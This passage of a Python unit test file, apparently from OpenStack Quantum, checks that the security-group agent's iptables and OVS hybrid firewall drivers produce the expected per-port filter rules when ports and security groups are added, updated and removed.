CHAINS_1 = CHAINS_EMPTY + '|i_port1|o_port1'
CHAINS_2 = CHAINS_1 + '|i_port2|o_port2'
IPTABLES_ARG['chains'] = CHAINS_1
IPTABLES_FILTER_1 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port1 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port1 ! -s 10.0.0.3 -j DROP
-A %(bn)s-o_port1 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_FILTER_1_2 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port1 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port1 -j RETURN -s 10.0.0.4
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port1 ! -s 10.0.0.3 -j DROP
-A %(bn)s-o_port1 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_ARG['chains'] = CHAINS_2
IPTABLES_FILTER_2 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port1 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port1 -j RETURN -s 10.0.0.4
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port1 ! -s 10.0.0.3 -j DROP
-A %(bn)s-o_port1 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-i_port2
-A %(bn)s-i_port2 -m state --state INVALID -j DROP
-A %(bn)s-i_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port2 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port2 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port2 -j RETURN -s 10.0.0.3
-A %(bn)s-i_port2 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-o_port2 -m mac ! --mac-source 12:34:56:78:9a:bd -j DROP
-A %(bn)s-o_port2 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port2 ! -s 10.0.0.4 -j DROP
-A %(bn)s-o_port2 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port2 -m state --state INVALID -j DROP
-A %(bn)s-o_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port2 -j RETURN
-A %(bn)s-o_port2 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_FILTER_2_2 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port1 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port1 ! -s 10.0.0.3 -j DROP
-A %(bn)s-o_port1 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-i_port2
-A %(bn)s-i_port2 -m state --state INVALID -j DROP
-A %(bn)s-i_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port2 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port2 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port2 -j RETURN -s 10.0.0.3
-A %(bn)s-i_port2 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-o_port2 -m mac ! --mac-source 12:34:56:78:9a:bd -j DROP
-A %(bn)s-o_port2 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port2 ! -s 10.0.0.4 -j DROP
-A %(bn)s-o_port2 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port2 -m state --state INVALID -j DROP
-A %(bn)s-o_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port2 -j RETURN
-A %(bn)s-o_port2 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_FILTER_2_3 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port1 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port1 -j RETURN -s 10.0.0.4
-A %(bn)s-i_port1 -j RETURN -p icmp
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port1 ! -s 10.0.0.3 -j DROP
-A %(bn)s-o_port1 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-i_port2
-A %(bn)s-i_port2 -m state --state INVALID -j DROP
-A %(bn)s-i_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port2 -j RETURN -p udp --dport 68 --sport 67 -s 10.0.0.2
-A %(bn)s-i_port2 -j RETURN -p tcp --dport 22
-A %(bn)s-i_port2 -j RETURN -s 10.0.0.3
-A %(bn)s-i_port2 -j RETURN -p icmp
-A %(bn)s-i_port2 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-o_port2 -m mac ! --mac-source 12:34:56:78:9a:bd -j DROP
-A %(bn)s-o_port2 -p udp --sport 68 --dport 67 -j RETURN
-A %(bn)s-o_port2 ! -s 10.0.0.4 -j DROP
-A %(bn)s-o_port2 -p udp --sport 67 --dport 68 -j DROP
-A %(bn)s-o_port2 -m state --state INVALID -j DROP
-A %(bn)s-o_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port2 -j RETURN
-A %(bn)s-o_port2 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_ARG['chains'] = CHAINS_EMPTY
IPTABLES_FILTER_EMPTY = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
""" % IPTABLES_ARG
IPTABLES_ARG['chains'] = CHAINS_1
IPTABLES_FILTER_V6_1 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p icmpv6 -j RETURN
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_ARG['chains'] = CHAINS_2
IPTABLES_FILTER_V6_2 = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port1 -j %(bn)s-i_port1
-A %(bn)s-i_port1 -m state --state INVALID -j DROP
-A %(bn)s-i_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p icmpv6 -j RETURN
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-i_port2
-A %(bn)s-i_port2 -m state --state INVALID -j DROP
-A %(bn)s-i_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port2 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-o_port2 -m mac ! --mac-source 12:34:56:78:9a:bd -j DROP
-A %(bn)s-o_port2 -p icmpv6 -j RETURN
-A %(bn)s-o_port2 -m state --state INVALID -j DROP
-A %(bn)s-o_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port2 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_ARG['chains'] = CHAINS_EMPTY
IPTABLES_FILTER_V6_EMPTY = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
""" % IPTABLES_ARG
FIREWALL_BASE_PACKAGE = 'quantum.agent.linux.iptables_firewall.'
class TestSecurityGroupAgentWithIptables(unittest.TestCase):
FIREWALL_DRIVER = FIREWALL_BASE_PACKAGE + 'IptablesFirewallDriver'
PHYSDEV_INGRESS = 'physdev-out'
PHYSDEV_EGRESS = 'physdev-in'
def setUp(self):
self.mox = mox.Mox()
agent_opts = [
cfg.StrOpt('root_helper', default='sudo'),
]
cfg.CONF.register_opts(agent_opts, "AGENT")
cfg.CONF.set_override(
'firewall_driver',
self.FIREWALL_DRIVER,
group='SECURITYGROUP')
self.addCleanup(mock.patch.stopall)
self.addCleanup(self.mox.UnsetStubs)
self.agent = sg_rpc.SecurityGroupAgentRpcMixin()
self.agent.context = None
self.root_helper = 'sudo'
self.agent.root_helper = 'sudo'
self.agent.init_firewall()
self.iptables = self.agent.firewall.iptables
self.mox.StubOutWithMock(self.iptables, "execute")
self.rpc = mock.Mock()
self.agent.plugin_rpc = self.rpc
rule1 = [{'direction': 'ingress',
'protocol': 'udp',
'ethertype': 'IPv4',
'source_ip_prefix': '10.0.0.2',
'source_port_range_min': 67,
'source_port_range_max': 67,
'port_range_min': 68,
'port_range_max': 68},
{'direction': 'ingress',
'protocol': 'tcp',
'ethertype': 'IPv4',
'port_range_min': 22,
'port_range_max': 22},
{'direction': 'egress',
'ethertype': 'IPv4'}]
rule2 = rule1[:]
rule2 += [{'direction': 'ingress',
'source_ip_prefix': '10.0.0.4',
'ethertype': 'IPv4'}]
rule3 = rule2[:]
rule3 += [{'direction': 'ingress',
'protocol': 'icmp',
'ethertype': 'IPv4'}]
rule4 = rule1[:]
rule4 += [{'direction': 'ingress',
'source_ip_prefix': '10.0.0.3',
'ethertype': 'IPv4'}]
rule5 = rule4[:]
rule5 += [{'direction': 'ingress',
'protocol': 'icmp',
'ethertype': 'IPv4'}]
self.devices1 = {'tap_port1': self._device('tap_port1',
'10.0.0.3',
'12:34:56:78:9a:bc',
rule1)}
self.devices2 = {'tap_port1': self._device('tap_port1',
'10.0.0.3',
'12:34:56:78:9a:bc',
rule2),
'tap_port2': self._device('tap_port2',
'10.0.0.4',
'12:34:56:78:9a:bd',
rule4)}
self.devices3 = {'tap_port1': self._device('tap_port1',
'10.0.0.3',
'12:34:56:78:9a:bc',
rule3),
'tap_port2': self._device('tap_port2',
'10.0.0.4',
'12:34:56:78:9a:bd',
rule5)}
def _device(self, device, ip, mac_address, rule):
return {'device': device,
'fixed_ips': [ip],
'mac_address': mac_address,
'security_groups': ['security_group1'],
'security_group_rules': rule,
'security_group_source_groups': [
'security_group1']}
def _regex(self, value):
value = value.replace('physdev-INGRESS', self.PHYSDEV_INGRESS)
value = value.replace('physdev-EGRESS', self.PHYSDEV_EGRESS)
value = value.replace('\n', '\\n')
value = value.replace('[', '\[')
value = value.replace(']', '\]')
return mox.Regex(value)
def _replay_iptables(self, v4_filter, v6_filter):
self.iptables.execute(
['iptables-save', '-t', 'filter'],
root_helper=self.root_helper).AndReturn('')
self.iptables.execute(
['iptables-restore'],
process_input=self._regex(v4_filter),
root_helper=self.root_helper).AndReturn('')
self.iptables.execute(
['iptables-save', '-t', 'nat'],
root_helper=self.root_helper).AndReturn('')
self.iptables.execute(
['iptables-restore'],
process_input=self._regex(IPTABLES_NAT),
root_helper=self.root_helper).AndReturn('')
self.iptables.execute(
['ip6tables-save', '-t', 'filter'],
root_helper=self.root_helper).AndReturn('')
self.iptables.execute(
['ip6tables-restore'],
process_input=self._regex(v6_filter),
root_helper=self.root_helper).AndReturn('')
def test_prepare_remove_port(self):
self.rpc.security_group_rules_for_devices.return_value = self.devices1
self._replay_iptables(IPTABLES_FILTER_1, IPTABLES_FILTER_V6_1)
self._replay_iptables(IPTABLES_FILTER_EMPTY, IPTABLES_FILTER_V6_EMPTY)
self.mox.ReplayAll()
self.agent.prepare_devices_filter(['tap_port1'])
self.agent.remove_devices_filter(['tap_port1'])
self.mox.VerifyAll()
def test_security_group_member_updated(self):
self.rpc.security_group_rules_for_devices.return_value = self.devices1
self._replay_iptables(IPTABLES_FILTER_1, IPTABLES_FILTER_V6_1)
self._replay_iptables(IPTABLES_FILTER_1_2, IPTABLES_FILTER_V6_1)
self._replay_iptables(IPTABLES_FILTER_2, IPTABLES_FILTER_V6_2)
self._replay_iptables(IPTABLES_FILTER_2_2, IPTABLES_FILTER_V6_2)
self._replay_iptables(IPTABLES_FILTER_1, IPTABLES_FILTER_V6_1)
self._replay_iptables(IPTABLES_FILTER_EMPTY, IPTABLES_FILTER_V6_EMPTY)
self.mox.ReplayAll()
self.agent.prepare_devices_filter(['tap_port1'])
self.rpc.security_group_rules_for_devices.return_value = self.devices2
self.agent.security_groups_member_updated(['security_group1'])
self.agent.prepare_devices_filter(['tap_port2'])
self.rpc.security_group_rules_for_devices.return_value = self.devices1
self.agent.security_groups_member_updated(['security_group1'])
self.agent.remove_devices_filter(['tap_port2'])
self.agent.remove_devices_filter(['tap_port1'])
self.mox.VerifyAll()
def test_security_group_rule_udpated(self):
self.rpc.security_group_rules_for_devices.return_value = self.devices2
self._replay_iptables(IPTABLES_FILTER_2, IPTABLES_FILTER_V6_2)
self._replay_iptables(IPTABLES_FILTER_2_3, IPTABLES_FILTER_V6_2)
self.mox.ReplayAll()
self.agent.prepare_devices_filter(['tap_port1', 'tap_port3'])
self.rpc.security_group_rules_for_devices.return_value = self.devices3
self.agent.security_groups_rule_updated(['security_group1'])
self.mox.VerifyAll()
class SGNotificationTestMixin():
def test_security_group_rule_updated(self):
name = 'webservers'
description = 'my webservers'
with self.security_group(name, description) as sg:
with self.security_group(name, description) as sg2:
security_group_id = sg['security_group']['id']
direction = "ingress"
source_group_id = sg2['security_group']['id']
protocol = 'tcp'
port_range_min = 88
port_range_max = 88
with self.security_group_rule(security_group_id, direction,
protocol, port_range_min,
port_range_max,
source_group_id=source_group_id
):
pass
self.notifier.assert_has_calls(
[call.security_groups_rule_updated(mock.ANY,
[security_group_id]),
call.security_groups_rule_updated(mock.ANY,
[security_group_id])])
def test_security_group_member_updated(self):
with self.network() as n:
with self.subnet(n):
with self.security_group() as sg:
security_group_id = sg['security_group']['id']
res = self._create_port(self.fmt, n['network']['id'])
port = self.deserialize(self.fmt, res)
data = {'port': {'fixed_ips': port['port']['fixed_ips'],
'name': port['port']['name'],
ext_sg.SECURITYGROUPS:
[security_group_id]}}
req = self.new_update_request('ports', data,
port['port']['id'])
res = self.deserialize(self.fmt,
req.get_response(self.api))
self.assertEquals(res['port'][ext_sg.SECURITYGROUPS][0],
security_group_id)
self._delete('ports', port['port']['id'])
self.notifier.assert_has_calls(
[call.security_groups_member_updated(
mock.ANY, [mock.ANY]),
call.security_groups_member_updated(
mock.ANY, [security_group_id])])
class TestSecurityGroupAgentWithOVSIptables(
TestSecurityGroupAgentWithIptables):
FIREWALL_DRIVER = FIREWALL_BASE_PACKAGE + 'OVSHybridIptablesFirewallDriver'
def _regex(self, value):
#Note(nati): tap is prefixed on the device
# in the OVSHybridIptablesFirewallDriver
value = value.replace('tap_port', 'taptap_port')
value = value.replace('o_port', 'otap_port')
value = value.replace('i_port', 'itap_port')
return super(
TestSecurityGroupAgentWithOVSIptables,
self)._regex(value)
| apache-2.0 | -953,503,682,981,960,700 | 43.724809 | 79 | 0.53262 | false | 3.154563 | true | false | false |
